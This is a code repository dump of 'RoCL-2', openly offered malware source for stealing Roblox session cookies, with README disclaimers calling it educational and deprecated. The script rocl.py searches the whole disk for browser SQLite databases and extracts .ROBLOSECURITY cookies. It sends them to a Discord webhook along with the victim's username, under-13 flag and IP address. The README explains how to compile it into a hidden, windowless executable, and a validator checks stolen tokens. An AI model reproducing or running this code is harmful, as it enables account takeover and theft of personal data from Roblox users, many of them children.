├── img ├── profile.jpeg └── rocl_icon.png ├── token_validator.py ├── README.md └── rocl.py /img/profile.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lilmond/RoCL-2/HEAD/img/profile.jpeg -------------------------------------------------------------------------------- /img/rocl_icon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lilmond/RoCL-2/HEAD/img/rocl_icon.png -------------------------------------------------------------------------------- /token_validator.py: -------------------------------------------------------------------------------- 1 | from bs4 import BeautifulSoup as htmlparser 2 | import requests 3 | 4 | def check_token(token: str) -> None: 5 | http = requests.get("https://www.roblox.com/home", cookies={".ROBLOSECURITY": token}) 6 | html = htmlparser(http.text, features="html.parser") 7 | 8 | user = html.find("meta", {"name": "user-data"}) 9 | 10 | if not user: 11 | print(f"\r\nERROR: invalid token\r\n") 12 | return 13 | 14 | info = "\r\n" \ 15 | f"Username: {user.get('data-name')}\r\n" \ 16 | f"User ID : {user.get('data-userid')}\r\n" \ 17 | f"Premium : {user.get('data-ispremiumuser')}\r\n" \ 18 | f"Underage: {user.get('data-isunder13')}\r\n" \ 19 | f"Creation: {user.get('data-created')}\r\n" 20 | 21 | print(info) 22 | 23 | def main(): 24 | try: 25 | while True: 26 | token = input("Token: ").strip() 27 | check_token(token) 28 | except KeyboardInterrupt: 29 | return 30 | 31 | if __name__ == "__main__": 32 | main() 33 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 🛡️ This tool is for educational purposes only. Do not use this against systems you don’t own or have permission to test. 2 | 3 | # NOTICE 4 | This program has been deprecated due to Roblox security updates and web browsers enhancing their securities. This is for educational purposes only. 5 | ## MORE INFOS 6 | If you'd like to recreate this program, here's some might-be-useful informations you might like to know before doing so and why it's been ceased from operating. 7 | - Roblox destroying cookies when the user's IP has been changed to a different region. Cool idea if you'd like to hear: use Discord websocket and basically make a Remote Code Execution (RCE) tool. 8 | - Web browsing applications encrypting SQLite files. We have not much understanding how they work. So if you'd like, you can figure out yourself. 9 | - Developer lacking motivation. 10 | 11 | # RoCL-2 12 | Please don't hack people. It's illegal! 13 | 14 | # Caution 15 | - I will not be responsible for any misuses of this tool. Use it at your own risk! 16 | 17 | # Python to EXE? 18 | - Install the PyInstaller package 19 | - Execute the command below 20 | ``` 21 | pyinstaller rocl.py -n "rocl" -i NONE --clean --onefile --noconsole 22 | ``` 23 | -------------------------------------------------------------------------------- /rocl.py: -------------------------------------------------------------------------------- 1 | from bs4 import BeautifulSoup as htmlparser 2 | import threading 3 | import requests 4 | import sqlite3 5 | import shutil 6 | import time 7 | import os 8 | 9 | webhook = "" 10 | logged_cookies = [] 11 | 12 | def search_cookie(file_path: "file") -> None: 13 | try: 14 | conn = sqlite3.Connection(file_path) 15 | sql = conn.execute('SELECT name FROM sqlite_master WHERE type="table"') 16 | result = sql.fetchall() 17 | tables = [tablename for table in result for tablename in table] 18 | for table in tables: 19 | sql = conn.execute(f'SELECT value FROM {table} WHERE host=".roblox.com" and name=".ROBLOSECURITY"') 20 | results = sql.fetchall() 21 | if len(results) == 0: return 22 | cookies = [value for result in results for value in result] 23 | for cookie in cookies: 24 | cookie = cookie.strip() 25 | if cookie in logged_cookies: 26 | continue 27 | logged_cookies.append(cookie) 28 | threading.Thread(target=log_cookie, args=[cookie], daemon=False).start() 29 | return 30 | except Exception: 31 | return 32 | 33 | def create_dir() -> "dirpath": 34 | dir_path = f"{os.getenv('TMP')}/.weeweewoo" 35 | if os.path.exists(dir_path): 36 | shutil.rmtree(dir_path) 37 | os.mkdir(dir_path) 38 | return dir_path 39 | 40 | def log_cookie(cookie: str) -> None: 41 | data = { 42 | "embeds": [ 43 | { 44 | "author": { 45 | "name": "ROCL V2", 46 | "url": "https://github.com/lilmond/RoCL-2", 47 | "icon_url": "https://raw.githubusercontent.com/lilmond/RoCL-2/main/img/rocl_icon.png" 48 | }, 49 | "color": 0x6414b4, 50 | "fields": [ 51 | { 52 | "name": "COOKIE", 53 | "value": cookie, 54 | "inline": False 55 | } 56 | ], 57 | "footer": { 58 | "text": "lilmond@github", 59 | "icon_url": "https://raw.githubusercontent.com/lilmond/RoCL-2/main/img/profile.jpeg" 60 | } 61 | } 62 | ] 63 | } 64 | 65 | extra_fields = [] 66 | user_info = get_cookie(cookie) 67 | if not user_info: 68 | add_field(extra_fields, "USER INFO", "Unable to get user info", True) 69 | else: 70 | add_field(extra_fields, "USERNAME", user_info.get("data-name"), True) 71 | add_field(extra_fields, "USER ID", user_info.get("data-userid"), True) 72 | add_field(extra_fields, "PREMIUM", user_info.get("data-ispremiumuser"), True) 73 | add_field(extra_fields, "UNDERAGE", user_info.get("data-isunder13"), True) 74 | add_field(extra_fields, "JOIN DATE", user_info.get("data-created"), True) 75 | ip = get_ip() 76 | add_field(extra_fields, "IP", ip, True) 77 | 78 | data["embeds"][0]["fields"] += extra_fields 79 | while True: 80 | try: 81 | http = requests.post(webhook, json=data) 82 | if not str(http.status_code).startswith("2"): 83 | continue 84 | break 85 | except Exception: 86 | continue 87 | return 88 | 89 | def get_cookie(cookie: str) -> dict: 90 | try: 91 | http = requests.get("https://www.roblox.com/home", cookies={".ROBLOSECURITY": cookie}) 92 | html = htmlparser(http.text, features="html.parser") 93 | user_info = html.find("meta", {"name": "user-data"}) 94 | return user_info 95 | except Exception: 96 | return 97 | 98 | def get_ip() -> str: 99 | try: 100 | http = requests.get("https://api.ipify.org") 101 | ip = http.text 102 | return ip 103 | except Exception: 104 | return "Unable to get IP address" 105 | 106 | def add_field(field: list, field_name: str, field_value: str, inline: bool) -> list: 107 | field.append({"name": field_name, "value": field_value, "inline": inline}) 108 | return field 109 | 110 | def add_onstartup() -> None: 111 | pass 112 | 113 | def main(): 114 | hidden_dir = create_dir() 115 | print(f"DIR: {hidden_dir}") 116 | sequence = 0 117 | for root, dirs, files in os.walk("/"): 118 | for file in files: 119 | if file.endswith(".sqlite"): 120 | sequence += 1 121 | if not root.endswith("/"): root = f"{root}/" 122 | file_path1 = f"{root}{file}" 123 | file_path2 = f"{hidden_dir}/cookies{sequence}.sqlite" 124 | shutil.copyfile(file_path1, file_path2) 125 | while True: 126 | if threading.active_count() > 50: 127 | time.sleep(.1) 128 | continue 129 | threading.Thread(target=search_cookie, args=[file_path2], daemon=False).start() 130 | break 131 | 132 | while True: 133 | if threading.active_count() == 1: 134 | shutil.rmtree(hidden_dir) 135 | return 136 | time.sleep(.1) 137 | 138 | if __name__ == "__main__": 139 | try: 140 | add_onstartup() 141 | while True: 142 | main() 143 | time.sleep(5) 144 | except KeyboardInterrupt: 145 | pass 146 | --------------------------------------------------------------------------------